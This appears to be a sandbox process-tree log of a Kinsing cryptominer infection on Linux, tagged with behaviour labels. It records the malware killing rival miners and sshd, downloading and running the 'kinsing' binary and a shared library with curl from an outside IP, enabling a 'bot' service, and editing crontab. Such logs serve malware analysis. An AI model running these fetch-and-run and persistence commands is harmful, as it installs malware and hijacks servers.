/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1451
-
-
/usr/bin/idid -u2⤵PID:1452
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1453 -
/usr/sbin/sendmailsendmail -t3⤵PID:1456
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOW0-0000NU-Np4⤵
- Reads CPU attributes
PID:1472
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1459
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOW0-0000NX-Jj4⤵
- Reads CPU attributes
PID:1469
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1460
-
-
-
/usr/bin/idid -u2⤵PID:1461
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1462
-
-
/bin/unameuname -m2⤵PID:1463
-
-
/bin/lsls -la /etc/data2⤵PID:1465
-
-
/bin/grepgrep -v grep2⤵PID:1467
-
-
/bin/grepgrep -e /dev2⤵PID:1466
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1468
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1470
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1473
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1474
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1475
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1476
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1478
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
PID:1480
-
-
/bin/grepgrep -v -2⤵PID:1485
-
-
/bin/grepgrep :14142⤵PID:1482
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1486
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1483
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1484
-
-
/bin/grepgrep -v grep2⤵PID:1489
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1490
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1488
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1491
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1487
-
-
/bin/grepgrep stratum2⤵PID:1493
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1492
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1496
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1495
-
-
/bin/grepgrep -v grep2⤵PID:1494
-
-
/bin/grepgrep -v grep2⤵PID:1499
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1500
-
-
/bin/grepgrep Sofia2⤵PID:1498
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1501
-
-
/bin/psps ax2⤵
- Reads CPU attributes
PID:1497
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
PID:1502
-
-
/bin/grepgrep -v grep2⤵PID:1505
-
-
/bin/grepgrep tracepath2⤵PID:1504
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1506
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1507
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1503
-
-
/bin/grepgrep -v grep2⤵PID:1510
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1511
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1512
-
-
/bin/grepgrep /dot2⤵PID:1509
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1508
-
-
/bin/grepgrep -v grep2⤵PID:1515
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1516
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1517
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1514
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1513
-
-
/bin/grepgrep -v grep2⤵PID:1520
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1519
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1521
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1522
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1518
-
-
/bin/grepgrep -v grep2⤵PID:1525
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1526
-
-
/bin/grepgrep "bash -k"2⤵PID:1524
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1527
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1523
-
-
/bin/grepgrep -v grep2⤵PID:1530
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1531
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1532
-
-
/bin/grepgrep perfctl2⤵PID:1529
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1528
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
PID:1533
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads runtime system information
PID:1534
-
-
/bin/grepgrep -v grep2⤵PID:1537
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1538
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1539
-
-
/bin/grepgrep ./ll12⤵PID:1536
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1535
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1543
-
-
/bin/grepgrep -v grep2⤵PID:1542
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1544
-
-
/bin/grepgrep agetty2⤵PID:1541
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1540
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
PID:1545
-
-
/bin/grepgrep 207.38.87.62⤵PID:1547
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1548
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1549
-
-
/bin/grepgrep -v -2⤵PID:1550
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1551
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1553
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1554
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1555
-
-
/bin/grepgrep -v -2⤵PID:1556
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1557
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1560
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1561
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1559
-
-
/bin/grepgrep -v -2⤵PID:1562
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1563
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1566
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1567
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1565
-
-
/bin/grepgrep -v -2⤵PID:1568
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1569
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1573
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1572
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1571
-
-
/bin/grepgrep -v -2⤵PID:1574
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1575
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1576
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1577
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
- Reads runtime system information
PID:1578
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
- Reads runtime system information
PID:1579
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
PID:1580
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1581
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1582
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
- Reads runtime system information
PID:1583
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
PID:1584
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
PID:1585
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1586
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1587
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
PID:1588
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
PID:1589
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1590
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
PID:1591
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
PID:1592
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1593
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1594
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
PID:1595
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1596
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1597
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1598
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1599
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1600
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1601
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
PID:1602
-
-
/bin/grepgrep -v grep2⤵PID:1605
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1606
-
-
/bin/grepgrep ./udp2⤵PID:1604
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1607
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1603
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1608
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1610
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1609
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1611
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1613
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1612
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1614
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1616
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1615
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1617
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1619
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1618
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1620
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1622
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1621
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1623
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1624
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1625
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1626
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1627
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1628
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1629
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1631
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1630
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1632
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1634
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1633
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1635
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1637
-
-
/bin/catcat /data/./oka.pid2⤵PID:1636
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1638
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1640
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1639
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1641
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1643
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1642
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
PID:1644
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1645
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads runtime system information
PID:1646
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1647
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
PID:1648
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
PID:1649
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1650
-
-
/bin/grepgrep -v grep2⤵PID:1653
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1654
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1655
-
-
/bin/grepgrep ./oka2⤵PID:1652
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1651
-
-
/bin/grepgrep -v grep2⤵PID:1658
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1659
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1657
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1660
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1656
-
-
/bin/grepgrep -v bin2⤵PID:1663
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1662
-
-
/bin/grepgrep -v "\\["2⤵PID:1664
-
-
/bin/grepgrep -v "("2⤵PID:1665
-
-
/bin/grepgrep -v php-fpm2⤵PID:1666
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1661
-
-
/bin/grepgrep -v proxymap2⤵PID:1667
-
-
/bin/grepgrep -v postgres2⤵PID:1668
-
-
/bin/grepgrep -v postgrey2⤵PID:1669
-
-
/bin/grepgrep -v kinsing2⤵PID:1670
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1671
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1672
-
-
/bin/grepgrep -v bin2⤵PID:1675
-
-
/bin/grepgrep -v "\\["2⤵PID:1676
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1674
-
-
/bin/grepgrep -v "("2⤵PID:1677
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
PID:1673
-
-
/bin/grepgrep -v php-fpm2⤵PID:1678
-
-
/bin/grepgrep -v proxymap2⤵PID:1679
-
-
/bin/grepgrep -v postgres2⤵PID:1680
-
-
/bin/grepgrep -v postgrey2⤵PID:1681
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1682
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1683
-
-
/bin/grepgrep -v bin2⤵PID:1686
-
-
/bin/grepgrep -v "\\["2⤵PID:1687
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1685
-
-
/bin/grepgrep -v "("2⤵PID:1688
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1684
-
-
/bin/grepgrep -v php-fpm2⤵PID:1689
-
-
/bin/grepgrep -v proxymap2⤵PID:1690
-
-
/bin/grepgrep -v postgres2⤵PID:1691
-
-
/bin/grepgrep -v postgrey2⤵PID:1692
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1693
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1694
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1697
-
-
/bin/grepgrep -v grep2⤵PID:1696
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1698
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1699
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1695
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1703
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1702
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1704
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1705
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1706
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1707
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1711
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1710
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1714
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1715
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1716
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1717
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1718
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1721
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1722
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1723
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1724
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1725
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1729
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1728
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1730
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1731
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1732
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1733
-
-
/usr/bin/idid -u2⤵PID:1735
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1736
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1749
-
-
/bin/sedsed /base64/d2⤵PID:1754
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1755
-
-
/usr/bin/crontabcrontab -l2⤵PID:1753
-
-
/bin/sedsed /_cron/d2⤵PID:1757
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1758
-
-
/usr/bin/crontabcrontab -l2⤵PID:1756
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1760
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1761
-
-
/usr/bin/crontabcrontab -l2⤵PID:1759
-
-
/bin/sedsed /update.sh/d2⤵PID:1763
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1764
-
-
/usr/bin/crontabcrontab -l2⤵PID:1762
-
-
/bin/sedsed /logo4/d2⤵PID:1766
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1767
-
-
/usr/bin/crontabcrontab -l2⤵PID:1765
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1770
-
-
/bin/sedsed /logo9/d2⤵PID:1769
-
-
/usr/bin/crontabcrontab -l2⤵PID:1768
-
-
/bin/sedsed /logo0/d2⤵PID:1772
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1773
-
-
/usr/bin/crontabcrontab -l2⤵PID:1771
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1776
-
-
/bin/sedsed /logo/d2⤵PID:1775
-
-
/usr/bin/crontabcrontab -l2⤵PID:1774
-
-
/bin/sedsed /tor2web/d2⤵PID:1778
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1779
-
-
/usr/bin/crontabcrontab -l2⤵PID:1777
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1782
-
-
/bin/sedsed /jpg/d2⤵PID:1781
-
-
/usr/bin/crontabcrontab -l2⤵PID:1780
-
-
/bin/sedsed /png/d2⤵PID:1784
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1785
-
-
/usr/bin/crontabcrontab -l2⤵PID:1783
-
-
/bin/sedsed /tmp/d2⤵PID:1787
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1788
-
-
/usr/bin/crontabcrontab -l2⤵PID:1786
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1790
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1791
-
-
/usr/bin/crontabcrontab -l2⤵PID:1789
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1793
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1794
-
-
/usr/bin/crontabcrontab -l2⤵PID:1792
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1796
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1797
-
-
/usr/bin/crontabcrontab -l2⤵PID:1795
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1800
-
-
/bin/sedsed /pastebin/d2⤵PID:1799
-
-
/usr/bin/crontabcrontab -l2⤵PID:1798
-
-
/bin/sedsed /onion/d2⤵PID:1802
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1803
-
-
/usr/bin/crontabcrontab -l2⤵PID:1801
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1806
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1805
-
-
/usr/bin/crontabcrontab -l2⤵PID:1804
-
-
/bin/sedsed /shuf/d2⤵PID:1808
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1809
-
-
/usr/bin/crontabcrontab -l2⤵PID:1807
-
-
/bin/sedsed /ash/d2⤵PID:1811
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1812
-
-
/usr/bin/crontabcrontab -l2⤵PID:1810
-
-
/bin/sedsed /mr.sh/d2⤵PID:1814
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1815
-
-
/usr/bin/crontabcrontab -l2⤵PID:1813
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1817
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1818
-
-
/usr/bin/crontabcrontab -l2⤵PID:1816
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1820
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1821
-
-
/usr/bin/crontabcrontab -l2⤵PID:1819
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1824
-
-
/bin/sedsed /45.137.151.106/d2⤵
- Reads runtime system information
PID:1823
-
-
/usr/bin/crontabcrontab -l2⤵PID:1822
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1826
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1827
-
-
/usr/bin/crontabcrontab -l2⤵PID:1825
-
-
/bin/sedsed /github/d2⤵PID:1832
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1833
-
-
/usr/bin/crontabcrontab -l2⤵PID:1831
-
-
/usr/bin/crontabcrontab -l2⤵PID:1834
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1836
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1835
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1839
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1838
-
-
/usr/bin/crontabcrontab -l2⤵PID:1837
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1841
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1842
-
-
/usr/bin/crontabcrontab -l2⤵PID:1840
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1844
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1845
-
-
/usr/bin/crontabcrontab -l2⤵PID:1843
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1847
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1848
-
-
/usr/bin/crontabcrontab -l2⤵PID:1846
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1850
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1851
-
-
/usr/bin/crontabcrontab -l2⤵PID:1849
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1853
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1854
-
-
/usr/bin/crontabcrontab -l2⤵PID:1852
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1856
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1857
-
-
/usr/bin/crontabcrontab -l2⤵PID:1855
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1859
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1860
-
-
/usr/bin/crontabcrontab -l2⤵PID:1858
-
-
/bin/sedsed /update.sh/d2⤵PID:1862
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1863
-
-
/usr/bin/crontabcrontab -l2⤵PID:1861
-
-
